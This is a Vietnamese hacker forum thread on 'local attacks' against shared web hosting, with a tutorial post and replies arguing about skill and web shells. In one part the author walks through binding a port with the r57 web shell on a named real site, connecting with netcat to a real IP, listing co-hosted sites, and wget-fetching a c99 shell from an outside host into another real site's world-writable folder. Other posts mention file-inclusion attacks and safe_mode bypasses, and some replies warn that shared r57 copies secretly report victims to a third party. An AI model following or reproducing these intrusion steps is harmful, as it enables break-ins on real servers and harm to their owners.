Hôm bữa rảnh một tí, tớ thử phân tích "con" r57 thì thấy có nhiều chi tiết lý thú. Tay Russian nào viết con này rất lém. Những kiddie nào dùng script đó để exploit thành công thì stats sẽ được log đến 1 server (khác). Chính người làm chủ stats server kia sẽ nắm trong tay chính xác bao nhiêu sites bị "con" r57 làm thịt và chính xác site nào luôn. E rằng các kiddie dùng mấy con script này không biết mấy cái chi tiết đó và đang đi làm... không công cho ai đó . Những server bị nhân nhượng có thể bị biến thành zombies --> hậu hoạn khó lường. Tip: soi các block base64 để biết chi tiết.

Có 1 số "script kiddies" khác lại thay cái base64 đó ghi log vào host của mình nữa ==> "script kiddies" cũng lém lắm đó anh :mrgreen:

Re: Tản mạn Local Attack :D

GirL Noob — GMT

:-o)

Re: Tản mạn Local Attack :D

gsmth — GMT

GirL Noob wrote:

:-o)

Định làm cái gì vậy ??

Tản mạn Local Attack :D

dinhcaohack — GMT

@gsmth : đọc bài của lão conmale page #1 @ Girl : k0 cãi nhau với em nữa :D, tùy em thích nghĩ thế nào thì nghĩ ^^ :) ... anh khuyên em nhiều rồi mà em vẫn thế ;) bb em

Re: Tản mạn Local Attack :D

GirL Noob — GMT

Phần 4 : drwxrwxrwx | rwxrwxrwx | 777 Các ký tự trên chắc ko còn ai xa lạ gì , Quỳnh Anh muốn nhắc lại 1 chút để dễ làm việc hơn với môi trường shell . Với Local Attack , các folder chmod 777 chính là một trong những yếu tố thuận lợi cho attackers . Ngẫm lại cũng buồn cười cho " đại ca " dinhcaohack của Vờ Nịt cứ đánh đố Quỳnh Anh là làm sao mà " đại ca " upload được shell trên viethacker.name :mrgreen: , ko lẽ bây giờ Quỳnh Anh ngồi liệt kê ra trăm ngàn cách để làm việc đó thì " đại ca " mới hiểu được là folder đó được chmod 777 hay sao haha , khổ thân cho " đại ca " tất cả các folder của vnmagic.net đều được chmod 701 nên " đại ca " phải remote qua viethacker.name mới có 1 folder chmod 777 :lol:) . Có lẽ ai cũng biết chuyện sử dụng r57 hay c99 để upload files vào 1 folder chmod 777 trên host victim đơn giản như thế nào rồi . Ở phần này Quỳnh Anh muốn nhắc đến 1 chức năng khác của r57 : Bind port to /bin/bash , và chúng ta sẽ làm việc trên Netcat . Hôm nay lang thang trên Google lụm được trang này về làm bài minh họa :

http://www.bullzer.com/ ( Xin cảm ơn )

Khi attackers đã upload r57 vào host của bullzer.com :

các bạn hãy nhìn vào mũi tên trên hình , trước tiên ta sẽ tìm xem IP của server này là gì :

Attackers có thể bind port bất kỳ qua r57 trên host victim :

và dễ dàng dùng Netcat connect vào cổng vừa mở ( như chúng ta đã biết IP của server trên là 209.67.219.235 và port Quỳnh Anh vừa bind là 1221) :

nc -vv 209.67.219.235 1221

Với các lệnh id : kiểm tra group hiện tại , pwd kiểm tra directory hiện tại . Tới đây có lẽ các bạn mới bắt đầu tìm hiểu hacking sẽ thắc mắc như vậy chúng ta sẽ làm gì tiếp tục ? tại sao chúng ta ko khai thác trực tiếp trên php shell ? Rất đơn giản , để khai thác 1 server , attackers cần phải có 1 môi trường thuận lợi , theo dõi tiếp tục bài viết các bạn sẽ thấy rõ vấn đề hơn . Nhưng trước tiên đi sang các phần khác , Quỳnh Anh nhắc lại 1 chút về Local Attack từ site này sang site khác cùng 1 sever ( ở đây chúng ta sử dụng Netcat ) . Hãy kiểm tra các sites trên cùng server này :

ls -la /etc/valiases

Kết quả sẽ như sau :

Chúng ta đã liệt kê được tất cả users và sites trên server này , Quỳnh Anh chọn site showpart.net làm mục tiêu . Xem lại các bước trên , các bạn sẽ dễ dàng nhận thấy các directory của các sites trên server này có dạng :

/home/user/public_html/

và site showpart.net có user là showpart , trở lại Netcat chúng ta dùng lệnh :

cd /home/showpart/public_html/ ls -lia

Dễ dàng nhận thấy thư mục cache và templates_c của site này chmod 777 , dễ dàng cho chúng ta upload php shell vào với các câu lệnh đơn giản sau :

- cd templates_c ( chuyển sang work directory /home/showpart/public_html/templates_c ) - wget [color="#2E8B57"]http://viethacker.name/testsh/9s1.txt[/color] ( link file shell c99 dạng txt ) - mv 9s1.txt girlnoob.php ( đổi file 9s1.txt thành girlnoob.php để sử dụng )

Và kết quả cuối cùng hãy kiểm tra xem nào :

Và bây giờ Quỳnh Anh chỉ việc mở url browser lên và connect vào http://showpart.net/templates_c/girlnoob.php nếu muốn tiếp tục công việc còn lại ... Phần 4 Quỳnh Anh tạm ngưng ở đây . Hi vọng các bạn sẽ có 1 cái nhìn thực tế hơn trong việc CHMOD 777 . Để bảo đảm an toàn cho các sites minh họa bài này Quỳnh Anh đã remove tất cả php shell , các bạn có thể ghé thăm người ta nhưng đừng cố tìm links shell làm gì nhé :wink: .

Tản mạn Local Attack :D

prof — GMT

Hello GirL Noob, Trước tiên, rất cảm ơn bạn đã có loạt bài viết tỉ mỉ cho HVA. Tuy nhiên, nếu lược bỏ đi một số câu từ đả kích một vài cá nhân, hay nhóm người nào đó ít nhiều có liên quan đến bạn, thì bài viết của bạn sẽ hay hơn. Khi đó, các thảo luận sẽ tập trung vào chuyên môn, thay cho việc xuất hiện lời qua tiếng lại trên diễn đàn mà tôi nghĩ bản thân bạn cũng không muốn thế, đúng ko nhỉ? :)) Mong bạn GirL Noob rút kinh nghiệm cho các bài viết sau. Thân.

Tản mạn Local Attack :D

GirL Noob — GMT

prof wrote:

Hello GirL Noob, Trước tiên, rất cảm ơn bạn đã có loạt bài viết tỉ mỉ cho HVA. Tuy nhiên, nếu lược bỏ đi một số câu từ đả kích một vài cá nhân, hay nhóm người nào đó ít nhiều có liên quan đến bạn, thì bài viết của bạn sẽ hay hơn. Khi đó, các thảo luận sẽ tập trung vào chuyên môn, thay cho việc xuất hiện lời qua tiếng lại trên diễn đàn mà tôi nghĩ bản thân bạn cũng không muốn thế, đúng ko nhỉ? :)) Mong bạn GirL Noob rút kinh nghiệm cho các bài viết sau. Thân.

Em xin lỗi , thật ra thì cũng vì người ta muốn nghe em nói thôi :(( . Em cũng hứa là ko nói thêm gì nữa rồi . Các bài viết sau em sẽ rút kinh nghiệm . Cảm ơn anh và mọi người quan tâm .

Tản mạn Local Attack :D

SonNguyen_sn — GMT

GirL Noob wrote:

[color="#FF0000"]Phần 2 :[/color] Trở lại việc VN MAGIC bị hack như thế nào mời các bạn xem qua hình dưới đây :

Quỳnh Anh có phải là Meo con Hacker không nhei. Cô bé đừng như thế nữa nhé. Tại sao Des tại đánh vnmagic. Và tại sao HCV lại ra đi? Rồi còn chú server upload của CHF nữa. :) và cái vnhacker.biz j j của E. Bọn E tự up 2 chú shell R57 và R59 lên đấy. Để rồi gậy ông đập lưng ông. ---- Bài viết của kưng rất có giá trị cho Newbie. Nhưng mọi người đừng theo đấy nhé. Phài biết cách tấn công thì mới phòng chống đc Nhưng đừng chọc j của ai nhé

Re: Tản mạn Local Attack :D

GirL Noob — GMT

@ SonNguyen_sn : nhầm người rồi bạn , vnhacker là cái gì ? Nói gì GirL no0B ko hiểu gì hết .

Re: Tản mạn Local Attack :D

conmale — GMT

GirL Noob wrote:

:-o)

Bởi vậy, khi dùng một thứ gì lấy trên mạng, nhớ 3 điều sau: 1) nếu không biết nó dùng để làm gì --> đừng tải về. 2) nếu biết nó dùng để làm gì nhưng không biết nó có làm cái gì khác hơn là chức năng đã được công bố --> đừng tải về. 3) nếu biết hết tất cả các chức năng của nó như đã được công bố nhưng không biết nó dung hại thế nào --> đừng tải về. Muốn thâm nhập, tàn phá, bảo vệ, phòng thủ.... đều phải biết rõ mình đang dùng cái gì và đang làm gì với nó. Đây là lý do tại sao tôi phát biểu lần đầu: Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn. Những ai có đủ kiên nhẫn, đủ kiến thức để soi mấy con r57, c99 và những con tương tự để "bào chế" theo ý mình thì không xếp vào dạng "script kiddie". Tuy nhiên, nếu vì thế mà cho mình là 'hacker' thì chưa đủ bởi vì vẫn dùng cái người khác đã tạo ra cho mục đích riêng của mình. Ngoài ra những hành vi đưa cái dòng "developed by...." và là những hành vi không thể chấp nhận được.

Re: Tản mạn Local Attack :D

anhdaikho_vt — GMT

Code:

uid=99(nobody) gid=99(nobody) groups=99(nobody)

Chời ạ, với id như thế mà làm mưa làm gió cả cái server được hả chài ? Khâm phục, khâm phục. :?)

Tản mạn Local Attack :D

navaro — GMT

Dạ anh comale nói đúng, tại lúc hứng chí nên thêm vô d... nhiều lúc nhìn vô thấy nó sao ấy nhưng lâu rồi ko sài nên thôi kệ để luôn....xấu hổ wa' à :">

Tản mạn Local Attack :D

dinhcaohack — GMT

Lão già conmale nói hay quá =)) ... Mỗi tội phải là "đừng sử dụng" chứ sao lại "đừng down về" :D ... Tôi thấy đau nhất là mấy kẻ tự xưng là .. hắc cơ rồi dùng code trên mạng dính shell kêu rầm trời lên rồi đổ cho là thủ đoạn. Đã vào underground mà không biết câu "Binh Bất Yếm Trá" à =)) ;))

Re: Tản mạn Local Attack :D

Ghost Ship — GMT

Bởi vậy, khi dùng một thứ gì lấy trên mạng, nhớ 3 điều sau: 1)nếu không biết nó dùng để làm gì --> đừng tải về. 2) nếu biết nó dùng để làm gì nhưng không biết nó có làm cái gì khác hơn là chức năng đã được công bố --> đừng tải về. 3) nếu biết hết tất cả các chức năng của nó như đã được công bố nhưng không biết nó dung hại thế nào --> đừng tải về.

Hix xưa nay em tải các thứ trên mạng về chả bao giờ em soi code rồi mới dùng (đúng hơn là kô biết soi). Mà phải tải về rồi tự soi rồi mới biết chính xác được chứ các bác. Thậm chí cùng là món đó nhưng lại được người khác sửa, thêm chức năng vào rồi up lên nói vẫn là nó thì làm sao mà biết được nếu kô down về tự mình soi. Mà mấy ai có đủ trình độ để soi chứ. Kết luận là nếu kô biết soi code thì đừng down thứ gì ("từ những nguồn kô đảm bảo" thì đủ hơn) trên mạng về. mà những người biết soi code có mấy ngừoi kô trải qua thời kỳ kô biết soi code :mrgreen: --> Chẳng mấy ai down cái gì ở những trang web đen nữa :mrgreen: --> những trang Web đen tồn tại làm gì :mrgreen: --->thế gới mới đẹp làm sao :mrgreen:

Re: Tản mạn Local Attack :D

conmale — GMT

Ghost Ship wrote:

Bởi vậy, khi dùng một thứ gì lấy trên mạng, nhớ 3 điều sau: 1)nếu không biết nó dùng để làm gì --> đừng tải về. 2) nếu biết nó dùng để làm gì nhưng không biết nó có làm cái gì khác hơn là chức năng đã được công bố --> đừng tải về. 3) nếu biết hết tất cả các chức năng của nó như đã được công bố nhưng không biết nó dung hại thế nào --> đừng tải về.
Hix xưa nay em tải các thứ trên mạng về chả bao giờ em soi code rồi mới dùng (đúng hơn là kô biết soi). Mà phải tải về rồi tự soi rồi mới biết chính xác được chứ các bác. Thậm chí cùng là món đó nhưng lại được người khác sửa, thêm chức năng vào rồi up lên nói vẫn là nó thì làm sao mà biết được nếu kô down về tự mình soi. Mà mấy ai có đủ trình độ để soi chứ. Kết luận là nếu kô biết soi code thì đừng down thứ gì ("từ những nguồn kô đảm bảo" thì đủ hơn) trên mạng về. mà những người biết soi code có mấy ngừoi kô trải qua thời kỳ kô biết soi code :mrgreen: --> Chẳng mấy ai down cái gì ở những trang web đen nữa :mrgreen: --> những trang Web đen tồn tại làm gì :mrgreen: --->thế gới mới đẹp làm sao :mrgreen:

Ừa... không biết soi code thì khoan hẵng mó vào những thứ "độc hại". Những người biết soi code ai cũng phải đi qua giai đoạn đọc code như đọc tiếng... Phạn. Tuy nhiên, cái khác ở chỗ là họ học để có thể đọc chúng nếu như muốn nghiên cứu về chúng, còn những người không có chút khả năng soi code mà vẫn cứ download về và dùng ầm ầm.... rồi cảm thấy... tự hào ;)). Tất cả những trang web cho download trojans, keyloggers, viruses... các scripts (php, perl....) là những nơi không bao giờ cho không một thứ gì hết. Nên nhớ điều này. Năm ngoái, 1 đám black hat bên Nga tuyên bố rằng, họ nắm trong tay hơn một triệu hosts trên Internet và đây là chuyện không ngoa tí nào. Có những người hiện đang nghĩ họ là 'héc cơ' nhưng thực chất, họ chính là những người làm không công nhưng rất đắc lực cho các đám black hat. Đây cũng là điều nên suy tư nhiều hơn.

Tản mạn Local Attack :D

L0ng3ta — GMT

Thế mới biết chơi với dao có ngày sẽ bị đứt tay trừ khi người ấy không cần dùng dao ... :D

Tản mạn Local Attack :D

dinhcaohack — GMT

Chơi với dao có ngày sẽ bị đứt tay trừ khi người ấy luôn biết nắm đằng chuôi ... :D

Re: Tản mạn Local Attack :D

GirL Noob — GMT

anhdaikho_vt wrote:

Code:
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Chời ạ, với id như thế mà làm mưa làm gió cả cái server được hả chài ? Khâm phục, khâm phục. :?)

Tại sao lại ko nhỉ :mrgreen: .

Local Attack mức độ nguy hiểm như thế nào mọi người xem kết quả rồi rút ra kết luận riêng nhé :

( Cái này chụp lại trước khi logout ai xem cũng biết là đang làm gì rồi hén , tốt nhất là ko nên quên bước này nếu ko muốn ... :cry: ) Nhận được khuyến cáo từ các anh đi trước về hậu quả khó lường nếu GirL no0B cứ tiếp tục tường thuật chi tiết các bước Get root , rootkit và Mass deface như các phần ở trên . Mục đích của GirL no0B khi viết bài này chỉ mong muốn được học hỏi thêm của mọi người và giúp các bạn newbie như GirL no0B có cái nhìn thực tế hơn trong việc bảo mật trước vấn đề Local Attack . GirL no0B ko hi vọng mình trở thành kẻ ... vẽ đường cho hươu chạy :wink: . Các phần tiếp theo chúng ta sẽ thảo luận vào 1 lúc thích hợp hơn nhé :P) .

Tản mạn Local Attack :D

kilua_vniss — GMT

hay quá mới bạn tường thuật cho anh em đỡ thèm nào :">

Re: Tản mạn Local Attack :D

anhdaikho_vt — GMT

Chắc serv này cấu hình "chuẩn" lắm nghen :!:) . Chời ơi á. Serv nào cũng như em serv này chắc chả ai dám thuê host nữa :cry: Pó giò.

Re: Tản mạn Local Attack :D

rename — GMT

Trình còi nhưng cũng thử edit remove đoạn code độc của con r57 :oops: Link đây http://findthepage.net/57.txt http://rapidshare.com/files/39022853/57.php

Re: Tản mạn Local Attack :D

GirL Noob — GMT

conmale wrote:

Muốn thâm nhập, tàn phá, bảo vệ, phòng thủ.... đều phải biết rõ mình đang dùng cái gì và đang làm gì với nó. Đây là lý do tại sao tôi phát biểu lần đầu: Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn. Những ai có đủ kiên nhẫn, đủ kiến thức để soi mấy con r57, c99 và những con tương tự để "bào chế" theo ý mình thì không xếp vào dạng "script kiddie". Tuy nhiên, nếu vì thế mà cho mình là 'hacker' thì chưa đủ bởi vì vẫn dùng cái người khác đã tạo ra cho mục đích riêng của mình. Ngoài ra những hành vi đưa cái dòng "developed by...." và là những hành vi không thể chấp nhận được.

Xin được gửi lời cảm ơn chân thành đến anh conmale cho lời khuyên cực kỳ giá trị này .

anhdaikho_vt wrote:

Chắc serv này cấu hình "chuẩn" lắm nghen :!:) . Chời ơi á. Serv nào cũng như em serv này chắc chả ai dám thuê host nữa :cry: Pó giò.

Cấu hình có chuẩn bao nhiêu cũng ko qua ... lỗi bảo mật bạn àh :D) .

Tản mạn Local Attack :D

nlfb — GMT

Tiếp đi chứ girl noob, mod đã chuyển qua đây là ok rồi mà, có gì thì cứ hỏi mod cho tận tình vào :)

Re: Tản mạn Local Attack :D

hack2prison — GMT

Các ký tự trên chắc ko còn ai xa lạ gì , Quỳnh Anh muốn nhắc lại 1 chút để dễ làm việc hơn với môi trường shell . Với Local Attack , các folder chmod 777 chính là một trong những yếu tố thuận lợi cho attackers . Ngẫm lại cũng buồn cười cho " đại ca " dinhcaohack của Vờ Nịt cứ đánh đố Quỳnh Anh là làm sao mà " đại ca " upload được shell trên viethacker.name , ko lẽ bây giờ Quỳnh Anh ngồi liệt kê ra trăm ngàn cách để làm việc đó thì " đại ca " mới hiểu được là folder đó được chmod 777 hay sao haha , khổ thân cho " đại ca " tất cả các folder của vnmagic.net đều được chmod 701 nên " đại ca " phải remote qua viethacker.name mới có 1 folder chmod 777

viethacker.name và vnmagic.net nằm chung một account và tay attacker đó có shell chung server sao không cat /path_to_vnmagic.net/conf_global.php để chọc database mà phải upload vào viethacker.name nhỉ. ???HIỂU ĐOẠN NÀY CHẾT LIỀN??? Nói chung người viết bài này chưa hiểu gì về local attack cả. Nhiều khi chẳng phải upload lên chung server mà có thể RFI (include shell từ host khác) hoặc LFI (include một file .jpg gif có nội dung của shell được upload lên qua chức năng upload avatar) hoặc đôi khi đọc được nội dung file bất kỳ thông qua thi hành một file stupid do lỗi code dạng như: http://site/stupid_code.php?act=path_to_file_attacker_want_to_read

Re: Tản mạn Local Attack :D

GirL Noob — GMT

hack2prison wrote:

viethacker.name và vnmagic.net nằm chung một account và tay attacker đó có shell chung server sao không cat /path_to_vnmagic.net/conf_global.php để chọc database mà phải upload vào viethacker.name nhỉ. ???HIỂU ĐOẠN NÀY CHẾT LIỀN??? Nói chung người viết bài này chưa hiểu gì về local attack cả. Nhiều khi chẳng phải upload lên chung server mà có thể RFI (include shell từ host khác) hoặc LFI (include một file .jpg gif có nội dung của shell được upload lên qua chức năng upload avatar) hoặc đôi khi đọc được nội dung file bất kỳ thông qua thi hành một file stupid do lỗi code dạng như: http://site/stupid_code.php?act=path_to_file_attacker_want_to_read

GirL no0B được nghe đến hack2prison nhiều mà chưa có dịp diện kiến , ko ngờ lại được hack2prison quan tâm đến bài viết của mình thật là vinh hạnh ghê đó :mrgreen: . Có lẽ hack2prison đã ko xem kỹ các phần đầu của bài viết có đoạn :

Trở lại VN Magic sau khi bị drop , nhân vật dinhcaohack này muốn che dấu các bước đi của mình ( để khai thác lâu dài hay một mục đích gì khác mà Quỳnh Anh chưa biết ) nên đã upload c99 vào folder testsh của site www.viethacker.name , site này nằm chung account với VN Magic trên IX WEB HOSTING nên không khó để làm việc này vì folder nói trên được CHMOD 777 ( ở phần 3 của bài viết chúng ta sẽ đi chi tiết vào vấn đề này ) .

thật ra mục đích của bài viết là chia sẽ với các bạn newbie các bước khai thác thông thường của Local Attack cho nên GirL no0B mới bắt đầu từ shell ở viethacker.name để tấn công vnmagic.net , chứ phần 1 bài viết đã giới thiệu rõ ràng cái trò bind code vào sources và skin để tạo thành lỗi Remote Files Inclusion , khai thác lỗi này thì quá phổ biến ai mà chưa từng biết :wink: . Và nói chung đúng như hack2prison nhận xét , GirL no0B hoàn toàn chưa hiểu gì về Local Attack cả , hi vọng được " đàn anh " đi trước chỉ bảo thêm . GirL no0B xin cảm ơn :D) .

Tản mạn Local Attack :D

kid_b0d — GMT

bài viết " khó hiểu" quá , nhưng có vẽ hay hay nhỉ . :d

Tản mạn Local Attack :D

nhocbmt — GMT

Hùm... ! Càng đọc thấy càng có nhiều ý kiến cá nhân ghê :) Chắc mọi người ở đây cũng bít em là ai :D Vâng nói luôn , em là lthh ( HCE ) ! OKeys ? ! Em là Supper Noob ! Đọc bài của Girl Noob hok hiểu cứ .... , nhưng có vài ý kiến như sau dành cho GN và 1 số cá nhân tham gia topic này ;) Nếu em có sai thì xin chỉ để em sữa ! OKey all ? 1. GN àh ! những gì mà sis viết ... loạt bài này ... quả thật có giá trị , nhưng những lời nhận xét , những lời bình của sis thì quả là.... đáng để cho người ta cười vào mặt í ! Lần sau nên tránh tình trạng viết 1 đằng bắn luôn 1 nẻo nhé ! "LOCAL ATTACKS" theo mình được xem như là 1 " KĨ THUẬT " , nếu biết cách tận dụng và sử dụng kĩ thuật đó " CÓ MỤC ĐÍCH " ! OK ? Vâng ! Như nhiều tuts mà lt đã viết , HACK là phải có " MỤC ĐÍCH " ! OKey ? Vnmagic gần đây hình như cũng từng đã bị HCE Deface khi sài serv win thì phải ??? Tại nghe mem nói thoai àh ! Chứ cũng hok rõ :D Mới đầu đọc ... tưởng chừng như GN thật cao siêu và biết suy nghĩ.... nhưng.... :) Và theo lt nghĩ , thế giới "hack" khi attacker đã có mục tiêu ( tức nhiên là mục tiêu phải có lợi cho attacker rồi ) thì có thể sữ dụng " mọi thủ đoạn " để đạt được mục tiêu đó ! OKies ? Bao gồm cả : scam , lô chai đại bát hay gì gì đó ..... ! Và GN nè , sis có nói "........ Ít nhất cũng biết trình độ của vài cá nhân ....... " -> Xin hõi dựa vào đâu để u xuất phát ra được câu nói này ??? 2. To 1 số cá nhân : Trích anh conmale :

Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn.

Em ko biết câu này anh chỉ nói riêng đến r57 , c99 hay anh là ám chỉ chung về webshell và remv ? Nếu anh ám chỉ chung về webshell ? OK -> Những attacker nào " khôn ngoan " thì chưa ai lớn khôn cả :) Nếu tui có nói sai thì mọi người hãy tự hõi lòng ý ! Giả sữ khi attack thành công , để thuận lợi cho công việc tiếp theo , chắc chắn rằng các bạn sẽ sữ dụng đến công cụ đại loại hay giống như thế ( ko cần biết là tool bạn tự viết hay là public source ) ... nó giúp các bạn rất nhiều để đạt đến "mục tiêu" phải ko nào ? Còn nhiều cái mún viết lắm.... nhưng nghĩ... :P Còn về chữ DEVELOP , em ko hiểu ? vd 1 open source , và mình phát triển thêm chức năng nào đó cho source đó thì có được ghi "thêm" chữ develop by ko ạ ? Nếu được thì ko nên nói NAVARO như thế :) Còn ko thì em cũng hok bít luôn :D hehe ! - Vài lời -nhocbmt

Tản mạn Local Attack :D

baothu — GMT

cái này phải xem lại GN ỏ trên thì nói là thật ko thông minh lắm khi dùng đồ của người khác mà ko hề quan tâm nó hoạt động như thế nào ,và tự mình thêm mấy cái dòng developed by ... nhưng ko lầm thì baothu thấy GN tự chửi mình hay sao ấy khi mà tiết lộ thông tin về việc mình dùng source code ko rõ nguồn gốc ,ko thèm xem lại rồi setup đến khi bị hack lại bảo giở thủ đoạn ? vì thế các webmaster nên rút ra bài học về tính nguyên vẹn của web app mình sử dùng và cẩn thận hơn Anyway ,tut rất có giá trị tham khảo ,thanks a lot

Re: Tản mạn Local Attack :D

xnohat — GMT

Làm đủ thứ để chạy được một tool shell trên server rồi, may quá Safe_mod = Off ( hiếm gặp :D) ) chậc quậy được đủ thứ, nhưng ngộ nhỡ cái Safe_mod = On thì sao nhỉ ? :wink:

Tản mạn Local Attack :D

baothu — GMT

sàe_mod on chẳng là gì cả đâu anh à hiện giờ có đủ phương pháp để by-pass safemod ,em có post trong box elite code by-pass safe_mod đó anh

Tản mạn Local Attack :D

GirL Noob — GMT

nhocbmt wrote:

Hùm... ! Càng đọc thấy càng có nhiều ý kiến cá nhân ghê :) Chắc mọi người ở đây cũng bít em là ai :D Vâng nói luôn , em là lthh ( HCE ) ! OKeys ? ! Em là Supper Noob ! Đọc bài của Girl Noob hok hiểu cứ .... , nhưng có vài ý kiến như sau dành cho GN và 1 số cá nhân tham gia topic này ;) Nếu em có sai thì xin chỉ để em sữa ! OKey all ? 1. GN àh ! những gì mà sis viết ... loạt bài này ... quả thật có giá trị , nhưng những lời nhận xét , những lời bình của sis thì quả là.... đáng để cho người ta cười vào mặt í ! Lần sau nên tránh tình trạng viết 1 đằng bắn luôn 1 nẻo nhé ! "LOCAL ATTACKS" theo mình được xem như là 1 " KĨ THUẬT " , nếu biết cách tận dụng và sử dụng kĩ thuật đó " CÓ MỤC ĐÍCH " ! OK ? Vâng ! Như nhiều tuts mà lt đã viết , HACK là phải có " MỤC ĐÍCH " ! OKey ? Vnmagic gần đây hình như cũng từng đã bị HCE Deface khi sài serv win thì phải ??? Tại nghe mem nói thoai àh ! Chứ cũng hok rõ :D Mới đầu đọc ... tưởng chừng như GN thật cao siêu và biết suy nghĩ.... nhưng.... :) Và theo lt nghĩ , thế giới "hack" khi attacker đã có mục tiêu ( tức nhiên là mục tiêu phải có lợi cho attacker rồi ) thì có thể sữ dụng " mọi thủ đoạn " để đạt được mục tiêu đó ! OKies ? Bao gồm cả : scam , lô chai đại bát hay gì gì đó ..... ! Và GN nè , sis có nói "........ Ít nhất cũng biết trình độ của vài cá nhân ....... " -> Xin hõi dựa vào đâu để u xuất phát ra được câu nói này ??? 2. To 1 số cá nhân : Trích anh conmale :
Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn.
Em ko biết câu này anh chỉ nói riêng đến r57 , c99 hay anh là ám chỉ chung về webshell và remv ? Nếu anh ám chỉ chung về webshell ? OK -> Những attacker nào " khôn ngoan " thì chưa ai lớn khôn cả :) Nếu tui có nói sai thì mọi người hãy tự hõi lòng ý ! Giả sữ khi attack thành công , để thuận lợi cho công việc tiếp theo , chắc chắn rằng các bạn sẽ sữ dụng đến công cụ đại loại hay giống như thế ( ko cần biết là tool bạn tự viết hay là public source ) ... nó giúp các bạn rất nhiều để đạt đến "mục tiêu" phải ko nào ? Còn nhiều cái mún viết lắm.... nhưng nghĩ... :P Còn về chữ DEVELOP , em ko hiểu ? vd 1 open source , và mình phát triển thêm chức năng nào đó cho source đó thì có được ghi "thêm" chữ develop by ko ạ ? Nếu được thì ko nên nói NAVARO như thế :) Còn ko thì em cũng hok bít luôn :D hehe ! - Vài lời -nhocbmt

@ nhocbmt : GirL no0B chỉ là newbie mới biết Net được khoảng đôi ba tháng , cũng không có quan hệ nhiều nên ko được cơ hội diện kiến các "bậc đàn anh" đi trước , mọi phán đoán của GirL no0B về 1 điều gì đó hay 1 người nào đó đều chỉ là qua thực tế mà nhận thấy và đưa ra cảm nghĩ riêng của mình . Tuy nhiên GirL no0B cũng từng nghe kể về Lãng Tử Hào Hoa một chút kiến thức bẻ đôi về mạng cũng ko có mà lại nắm vị trí admin của HCE , nay được gặp quả nhiên thấy lời đồn ko ngoa , chính mình cũng ko hiểu mình đang phát biểu điều gì , lại còn lấy làm tự hào cái trò bind code vào skin của HCE mà gọi là "hack" serv win ( nguyên văn ) , âu rằng sự sụp đổ của HCE cũng là điều ko thể tránh . GirL no0B chỉ thành thật muốn nhắc lthh hay nhocbmt gì đó rằng trước tiên hãy xem kỹ từ đầu đến cuối nội dung bài thảo luận , hiểu được người ta đang nói điều gì thì hãy lên tiếng góp ý .Trả lời riêng cho bạn về câu hỏi được đậm màu đỏ ở trên là chính là nhờ những điều thực tế đang xảy ra ví dụ như là sau khi nhận được bài reply của bạn đây mà GirL no0B có thể khẳng định được . Tại sao ai cũng hiểu mà chỉ 1 người ko hiểu nhỉ :?:) . @ hackernohat : đúng như baothu nói vậy đó anh , safe mode off hay on bây giờ cũng không khác nhau mấy đâu . @ baothu : GirL no0B ko hề thêm vào dòng Developed by ... nào cả , đấy chính là tác phẩm của HCE Group , có lẽ bạn cũng nên xem lại từ đầu topic thì sẽ nắm bắt nhiều hơn :mrgreen: .

Tản mạn Local Attack :D

venus_007 — GMT

bác baothu nói đúng đó GN à! chỉ là thửa đi dấu ',' mà thôi. bạn đọc kỹ sẽ rõ, chủ đề đang bị lạc hướng thì phải. ^^

Re: Tản mạn Local Attack :D

nil — GMT

Bạn GirL Noob tiếp tục về phần get root và safe mode gì đó đi, phần này chắc là hay. Các bác đừng cãi nhau to thế chứ, đây là topic kỹ thuật mà. :))

Tản mạn Local Attack :D

nhocbmt — GMT

ừhm.. ! Đây là topic về kĩ thuật :)

Tuy nhiên GirL no0B cũng từng nghe kể về Lãng Tử Hào Hoa một chút kiến thức bẻ đôi về mạng cũng ko có mà lại nắm vị trí admin của HCE , nay được gặp quả nhiên thấy lời đồn ko ngoa , chính mình cũng ko hiểu mình đang phát biểu điều gì , lại còn lấy làm tự hào cái trò bind code vào skin của HCE mà gọi là "hack" serv win ( nguyên văn ) , âu rằng sự sụp đổ của HCE cũng là điều ko thể tránh .

YEah ! Như đã nói ở trên :) I'm supper noob ! OK ! but xem lại 1 xí :

lại còn lấy làm tự hào cái trò bind code vào skin của HCE mà gọi là "hack" serv win ( nguyên văn )

ê !lụm đâu ra dậy ? còn ghi " nguyên văn " nữa mới đau chứ ? xem lại :

Vnmagic gần đây hình như cũng từng đã bị HCE Deface khi sài serv win thì phải??? Tại nghe mem nói thoai àh ! Chứ cũng hok rõ :D

Đã và đang xem , phần tiếp tục của pro GIRL NOOB :) CỨ tiếp tục .....

Tản mạn Local Attack :D

dinhcaohack — GMT

lthh ơi lthh .... ai chấp vặt làm gì, giờ phải dùng ngôn từ bình dị hòa giải để noi cho em ấy hiểu rõ cái sai . Ai cũng biết là những em "mới lớn" thường thích thể hiện mình, muốn được người khác "để ý" ... :p .. mỗi tội anh lớn rồi, qua tuổi để ý mấy bé gái .... =(( Nghe giang hồ đồn, có vẻ Girl_Noob mới hạ sơn. Qua lời kể của cậu Vietluv với Kingasawa mà nên coi ai cũng bằng nửa con mắt =)) Anh cũng biết là "Trường Giang sóng lớp sau đè lớp trước, trong giang hồ tân nhân thắng cựu nhân" ... anh thấy em thắng thì ít mà gây thù chuốc oán thì nhiều Ra ngoài đời với ai cũng phải tôn trọng em ạ, chứ cứ kiểu này nhiều thằng nó xin huyết em sớm :D

Tản mạn Local Attack :D

mrro — GMT

Thiệt tình nói bồ Girl Noob đừng buồn, tôi đọc từ đầu đến giờ cũng hơn 3 trang rồi mà vẫn chưa thấy chỗ nào là của bồ Girl Noob tự viết hết. Những chi tiết bồ Girl Noob đưa ra đều hoặc sử dụng công cụ nào đó của người khác, hoặc khai thác một lỗi phần mềm đã biết nào đó, tôi vẫn chưa thấy được một chút gì đó gọi là sáng tạo hay của riêng cá nhân bồ Girl Noob. Nếu phần kế tiếp bồ cũng chỉ tiếp tục quanh đi quẩn lại như thế thì dẫu bồ có get root được server, tôi cũng chẳng có hứng thú đọc tiếp. Nếu quả thật như thế, tôi chân thành khuyên bồ không nên viết tiếp nữa làm gì, mà nên dành thời gian để làm những việc khác có ích hơn, chẳng hạn như đọc sách. Vài góp ý, -m

Tản mạn Local Attack :D

vns3curity — GMT

Tản mạn thì vẫn là tản mạn . Sự thật ra sao chủ nhân nó còn chưa biết và ... còn chưa biết lấy gì mọi người biết :)

Re: Tản mạn Local Attack :D

Choen — GMT

